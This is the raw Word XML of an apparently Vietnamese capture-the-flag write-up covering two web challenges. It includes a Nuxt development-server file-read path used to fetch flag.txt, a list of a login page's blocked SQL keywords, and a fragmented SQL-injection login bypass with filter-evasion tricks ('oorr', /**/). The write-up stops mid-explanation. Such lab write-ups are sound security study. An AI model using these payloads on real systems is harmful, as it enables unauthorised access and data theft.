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5DD09E" w14:textId="7096EDE2" w:rsidR="00D6725D" w:rsidRPr="00D6725D" w:rsidRDefault="00D6725D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6725D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 1: A simple website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6930F760" w14:textId="77777777" w:rsidR="00D6725D" w:rsidRDefault="00D6725D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D6BA9E" w14:textId="03857ECA" w:rsidR="002F49FE" w:rsidRDefault="003A71C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/_nuxt/app/packages</w:t>
      </w:r>
      <w:r w:rsidR="00215233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/nuxt/src/app/</w:t>
      </w:r>
      <w:r w:rsidR="007F3348">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>entry.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3871A243" w14:textId="04676076" w:rsidR="007F3348" w:rsidRDefault="00901D3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/_nuxt/@vite/client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEC505C" w14:textId="60D38374" w:rsidR="00901D3C" w:rsidRDefault="00901D3C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59360B07" w14:textId="2A93B062" w:rsidR="00175410" w:rsidRDefault="0017541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Theo Wappalyzer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D66F586" w14:textId="4C69F7AD" w:rsidR="00901D3C" w:rsidRPr="00175410" w:rsidRDefault="00175410" w:rsidP="00175410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75410">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thư viện web là Nuxt.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411086DB" w14:textId="01BF8C39" w:rsidR="00175410" w:rsidRPr="00175410" w:rsidRDefault="00175410" w:rsidP="00175410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75410">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ngôn ngữ lập trình là Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198E0AE9" w14:textId="77777777" w:rsidR="00175410" w:rsidRPr="00175410" w:rsidRDefault="00175410" w:rsidP="00175410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75410">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thư viện Javascript là Nuxt.js và Vue.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7328A5" w14:textId="11B5831A" w:rsidR="00175410" w:rsidRPr="00175410" w:rsidRDefault="00175410" w:rsidP="00175410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175410">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tạo trang tĩnh là Nuxt.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1673F1F8" w14:textId="610BB665" w:rsidR="00215233" w:rsidRDefault="009F3B4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Công nghệ mà trang web sử dụng là Nuxt ở phiên bản </w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B4C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.0.0-rc.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19612DB7" w14:textId="77777777" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E53B12" w14:textId="2944C700" w:rsidR="00A8508A" w:rsidRDefault="009F3B4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Lỗ hổng đọc file trong nuxt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E930D03" w14:textId="4AB090BA" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3B4C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://huntr.com/bounties/7840cd32-af15-40cb-a148-7ef3dff4a0c2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7385705B" w14:textId="77777777" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73355A51" w14:textId="61345150" w:rsidR="00A8508A" w:rsidRPr="009F3B4C" w:rsidRDefault="00A8508A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3B4C">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://localhost:45681/__nuxt_vite_node__/module/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F204673" w14:textId="043B8232" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79FE7886" w14:textId="2FD37967" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4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Nó cho 1 chuỗi base64:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE53B55" w14:textId="70234BB4" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4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10CAFC" wp14:editId="6B1718E7">
            <wp:extent cx="5270568" cy="1342663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7" r="48783" b="71327"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5310247" cy="135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C26EA" w14:textId="3D2F2FA7" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D422DE3" w14:textId="77777777" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4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Giải mã bằng cyberchef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17559C1B" w14:textId="77777777" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3228C4CA" w14:textId="77777777" w:rsidR="009F3B4C" w:rsidRPr="009F3B4C" w:rsidRDefault="009F3B4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3B4C">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{"version":3,"file":null,"sources":["flag.txt"],"sourcesContent":["export default \"/_nuxt/@fs/flag.txt\""],"names":[],"mappings":"AAAA,8BAAc,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226B2C20" w14:textId="77777777" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1720C29B" w14:textId="574EB733" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4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thấy đường dẫn  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B4C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/_nuxt/@fs/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>path-to-file trong Burpsuite có thể đọc file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2796811C" w14:textId="53E3D66E" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A609D5" w14:textId="66720FFC" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4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0DC133C" wp14:editId="42073973">
            <wp:extent cx="5257800" cy="4699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15C69" w14:textId="77777777" w:rsidR="009F3B4C" w:rsidRDefault="009F3B4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="212792B3" w14:textId="6714766F" w:rsidR="009F3B4C" w:rsidRPr="009F3B4C" w:rsidRDefault="009F3B4C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3B4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flag: TCP1P{OuTD4t3d_NuxxT_fR4m3w0RkK}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700E0627" w14:textId="4F859469" w:rsidR="00215233" w:rsidRDefault="00215233">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="529B5CE8" w14:textId="6B8EF532" w:rsidR="00F9152B" w:rsidRPr="00D6725D" w:rsidRDefault="00D6725D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6725D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 2: Bypassss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6661607E" w14:textId="40BFC02E" w:rsidR="00D6725D" w:rsidRDefault="00D6725D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="173C6899" w14:textId="480ACE00" w:rsidR="00D6725D" w:rsidRDefault="00ED1C2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Web Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618DAA5E" w14:textId="12CDC639" w:rsidR="00ED1C2F" w:rsidRDefault="00ED1C2F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE5DCB9" w14:textId="5F76E70C" w:rsidR="00ED1C2F" w:rsidRDefault="00ED1C2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Xem source code HTML thấy lộ thư mục assets</w:t>
      </w:r>
      <w:r w:rsidR="00BB43E6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ập tin check-login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8A934B" w14:textId="32419F94" w:rsidR="00BB43E6" w:rsidRDefault="00BB43E6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A93CA02" w14:textId="21C9F477" w:rsidR="00BB43E6" w:rsidRDefault="00BB43E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 trang web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB44EDF" w14:textId="2F42B274" w:rsidR="00BB43E6" w:rsidRDefault="00BB43E6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC4E622" w14:textId="340941BB" w:rsidR="00BB43E6" w:rsidRDefault="00BB43E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22B71E8" wp14:editId="31BB5754">
            <wp:extent cx="4488836" cy="272005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03" r="40214" b="33932"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4501472" cy="272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58762" w14:textId="32D00B91" w:rsidR="00BB43E6" w:rsidRDefault="00BB43E6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="725879D0" w14:textId="4DABC563" w:rsidR="00BB43E6" w:rsidRDefault="00BB43E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POST /check-login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6FF557" w14:textId="77777777" w:rsidR="00BB43E6" w:rsidRDefault="00BB43E6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB43E6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">username=admin" or 1=1# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58689CC5" w14:textId="6523E425" w:rsidR="00BB43E6" w:rsidRDefault="00BB43E6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB43E6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password=fadksljfadsklf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1E8103" w14:textId="14D89F98" w:rsidR="00BB43E6" w:rsidRDefault="00BB43E6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB43E6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Đăng nhập thất bại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556F40FE" w14:textId="281D21A6" w:rsidR="00BB43E6" w:rsidRDefault="00BB43E6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A578AF" w14:textId="4782FDBB" w:rsidR="00BB43E6" w:rsidRDefault="00BB43E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Xem source code nó chặn cái gì:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F22E8" w14:textId="77777777" w:rsidR="00BB43E6" w:rsidRDefault="00BB43E6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A0A52B" w14:textId="3F0400FF" w:rsidR="00BB43E6" w:rsidRDefault="002D6DD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B5CABDD" wp14:editId="584E1B87">
            <wp:extent cx="4927600" cy="1257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7064A" w14:textId="7DA8FB94" w:rsidR="00037510" w:rsidRDefault="00037510">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C84D88" w14:textId="17979C96" w:rsidR="00037510" w:rsidRDefault="00037510">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nó chặn các kí tự sau: </w:t>
      </w:r>
      <w:r w:rsidRPr="00037510">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00037510">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00037510">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, ;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00037510">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:r w:rsidR="005C3C97">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> % , = , - , whitespace , ( , )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5EE402" w14:textId="095DFF71" w:rsidR="005C3C97" w:rsidRDefault="005C3C97">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="761D35F0" w14:textId="77777777" w:rsidR="005C3C97" w:rsidRDefault="005C3C97">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5A0799" w14:textId="5AE254F8" w:rsidR="002D6DD9" w:rsidRDefault="002D6DD9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E28683" w14:textId="71C8BAEC" w:rsidR="002D6DD9" w:rsidRDefault="002D6DD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9C25A0C" wp14:editId="03CE3F7A">
            <wp:extent cx="5562600" cy="3721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7F0FC" w14:textId="77A4DA1F" w:rsidR="00596B70" w:rsidRDefault="00596B70">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A50CAA8" w14:textId="0B361430" w:rsidR="00596B70" w:rsidRDefault="00596B7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Nó chặn các chuỗi sau: union, or, and, by, select, sleep, benchmark, true, false, </w:t>
      </w:r>
      <w:r w:rsidR="005108EE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\d (các ký tự số)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A56F57" w14:textId="2EC6AAC2" w:rsidR="002D6DD9" w:rsidRDefault="002D6DD9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C06D136" w14:textId="7F5C99DF" w:rsidR="0063657E" w:rsidRDefault="0063657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Câu truy vấn: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C51936" w14:textId="7BDDD900" w:rsidR="0063657E" w:rsidRDefault="0063657E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C269FFA" wp14:editId="1FA1057F">
            <wp:extent cx="5943600" cy="3854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D0C9" w14:textId="4D886531" w:rsidR="00C0135F" w:rsidRDefault="00C0135F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799BB849" w14:textId="24E5147E" w:rsidR="004B2CA7" w:rsidRDefault="005108E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là 1 câu truy vấn bình thường với 1 lượng lớn filter như vậy thì mình cũng không bypass được nhưng nó là trang đăng nhập, bypass trang đăng nhập còn 1 dạng khác là fragmented sql injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2217F063" w14:textId="77777777" w:rsidR="002C7760" w:rsidRDefault="002C7760">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41228B73" w14:textId="52AF1726" w:rsidR="004B2CA7" w:rsidRDefault="004B2CA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select * from admin where username = </w:t>
      </w:r>
      <w:r w:rsidRPr="004B2CA7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="004B2CA7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and password = </w:t>
      </w:r>
      <w:r w:rsidRPr="004B2CA7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1 #</w:t>
      </w:r>
      <w:r w:rsidRPr="004B2CA7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E502117" w14:textId="77777777" w:rsidR="002C7760" w:rsidRDefault="002C7760">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7942E767" w14:textId="43819C25" w:rsidR="002C7760" w:rsidRPr="002C7760" w:rsidRDefault="002C7760">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7760">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username=</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7760">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C8CEB7" w14:textId="43124D8A" w:rsidR="002C7760" w:rsidRPr="002C7760" w:rsidRDefault="002C7760">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7760">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password=</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7760">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or 1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30358D56" w14:textId="117BECCB" w:rsidR="002C7760" w:rsidRDefault="002C7760">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="321BA8E6" w14:textId="5351BAEB" w:rsidR="002C7760" w:rsidRDefault="002C776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Chuỗi or và số bị filter rồi, chúng ta có thể bypass hàm preg_replace dễ dàng bằng oorr (nó chỉ thay thế chuỗi 1 lần).  Tương tự là trtrueue và /**/ để thay cho khoảng trắng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB861D" w14:textId="52850038" w:rsidR="002C7760" w:rsidRDefault="002C7760">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53663D95" w14:textId="77777777" w:rsidR="002C7760" w:rsidRDefault="002C7760">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2673EE1A" w14:textId="488231EA" w:rsidR="002C7760" w:rsidRDefault="002C7760">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C1A903" w14:textId="77777777" w:rsidR="002C7760" w:rsidRDefault="002C7760">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
